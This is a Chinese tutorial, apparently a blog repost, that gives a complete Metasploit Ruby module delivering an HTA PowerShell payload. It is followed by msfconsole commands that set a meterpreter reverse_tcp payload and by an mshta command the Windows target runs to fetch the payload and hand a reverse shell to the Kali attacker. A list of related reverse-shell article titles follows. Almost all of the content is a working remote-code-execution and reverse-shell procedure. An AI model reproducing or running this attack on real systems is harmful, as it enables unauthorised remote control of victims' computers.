kali系统准备:

  复制以下ruby代码到/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb目录(要注意代码缩进哦):

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##class MetasploitModule  < Msf::Exploit::RemoteRank = NormalRankinginclude Msf::Exploit::Remote::HttpServerdef initialize(info  = {})super(update_info(info,'Name' => 'Microsoft Office Payload Delivery','Description' => %q{This module generates an command to place withina word document, that when executed, will retrieve a HTA payloadvia HTTP from an web server. Currently have not figured out howto generate a doc.},'License' => MSF_LICENSE,'Arch' => ARCH_X86,'Platform' => 'win','Targets' =>[['Automatic', {} ],],'DefaultTarget' => 0,))enddef on_request_uri(cli, _request)print_status("Delivering payload")p = regenerate_payload(cli)data = Msf::Util::EXE.to_executable_fmt(framework,ARCH_X86,'win',p.encoded,'hta-psh',{ :arch => ARCH_X86, :platform => 'win '})send_response(cli, data, 'Content-Type' => 'application/hta')enddef primerurl = get_uriprint_status("Place the following DDE in an MS document:")print_line("mshta.exe \"#{url}\"")end
end

  在命令行启动msf的服务:

service postgresql start

  再启动msf:

sudo msfconsole

  重新加载所有模块:

reload_all

  查找我们刚刚新建的msh_shell模块:

search msh_shell

  加载这个模块:

use exploit/windows/smb/msh_shell

  使用反弹shellcode, 配置本机地址,  配置uri地址

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.105
set uripath aaaa
exploit

  window系统:

  打开运行命令,执行:

mshta http://kali系统的IP/aaaa

  kali系统就会收到一个window系统的shell

转载于:https://www.cnblogs.com/diligenceday/p/7906878.html

mshta 反弹shell相关推荐

  1. 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试

    文章目录 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC mshta.exe利用 msf利用模块 方法一(msfconsole) 方法二(msfvenom) Cobal ...

  2. 网络安全-木马入侵windows -msfvenom反弹shell(CMD)

    网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...

  3. 内网渗透之Windows反弹shell(一)

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...

  4. msf反弹shell

    今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享.( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1.msfconsole #启动msf 2.msfvenom - ...

  5. cve-2018-2628 Weblogic反序列化漏洞实现反弹shell

    测试机:MacBook-Air 测试机IP:192.168.0.100 靶机IP:192.168.0.100:7001 环境: docker 工具:CVE-2018-2628漏洞利用工具包 下载 一. ...

  6. java Runtime.getRuntime().exec 获取反弹shell

    说明 前面写了一篇在Java环境下获取shell的文章.当时使用的语句是: Runtime r = Runtime.getRuntime(); Process p = r.exec(new Strin ...

  7. icmp反弹shell 简介

    目录 第一节 轶事 第二节 技术原理 第三节 ICMP反弹shell 第一节 轶事 首次听说icmp隧道,要从免费上网说起.当年的网费还是挺贵的,大学生上个网还是容易"破产"呀.当 ...

  8. python3 利用eval反弹shell

    在最近的python开发中 用到了 字符串转字典 使用了eval 这让我想起了php中的eval 搜索一下果然问题严重 既然有问题 那就来试试反弹shell吧 看看效果 搜索一下 找到了 python ...

  9. linux下几种反弹Shell方法的总结与理解

    实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port ...

最新文章

  1. 什么影响oracle io,Oracle IO问题解析
  2. WEB程序调用客户端程序
  3. Java之正則表達式【使用语法】
  4. VS2008环境下开发的某些程序在其他机器运行提示“由于应用程序配置不正确,应用程序未能启动”的问题(IIS)...
  5. JetBrains:webstrom中代码模板设置
  6. HanLP1.5.2 -python使用介绍
  7. 05-基础widgets
  8. 基于SSM和Vue的旅游网和旅游管理系统
  9. 如何修改图片尺寸,分辨率大小,三种方式对比。
  10. 《浪潮之巅》内容整理
  11. 基于时空注意力的图卷积网络在路段级交通预测中的应用
  12. Python Str字符串 字符串常用方法 定义 创建 拆分 成分判断 大小写调整 格式化 填充 替换 访问 查找
  13. 6个有效激励合作伙伴和促进推荐的小技巧
  14. 基于Go语言GoFrame+Vue+ElementUI的OA办公系统
  15. Eureka常见问题解答
  16. 如何修改安卓应用图标和程序名称
  17. 17开头的是什么号码?为什么17开头手机号最好不要用
  18. 【StoneDB join 算法分析】查询模块
  19. 永恩上线服务器维护,LOL网友爆料:劫将推出至臻皮肤,卢锡安赛娜情侣皮肤即将上线?...
  20. cad指北针lisp_建筑施工图常用符号及图例

热门文章

  1. 单身男女问题的科学解决方案
  2. 小程序单纯的字体倾斜 和 字体渐变
  3. 信息安全系统设计基础学习项目_进程间通信
  4. jdbc连接oracle教程
  5. MySQL45讲学习笔记(1)
  6. 将服务器文件导入docker,将本地docker容器迁移到服务端
  7. 分布式系统(P2P Lookup)
  8. 如何在网页设计中使用个性化字体
  9. 创业折腾1年赔光积蓄,我决定重新做回程序员了!!!
  10. 机器学习--线性回归R语言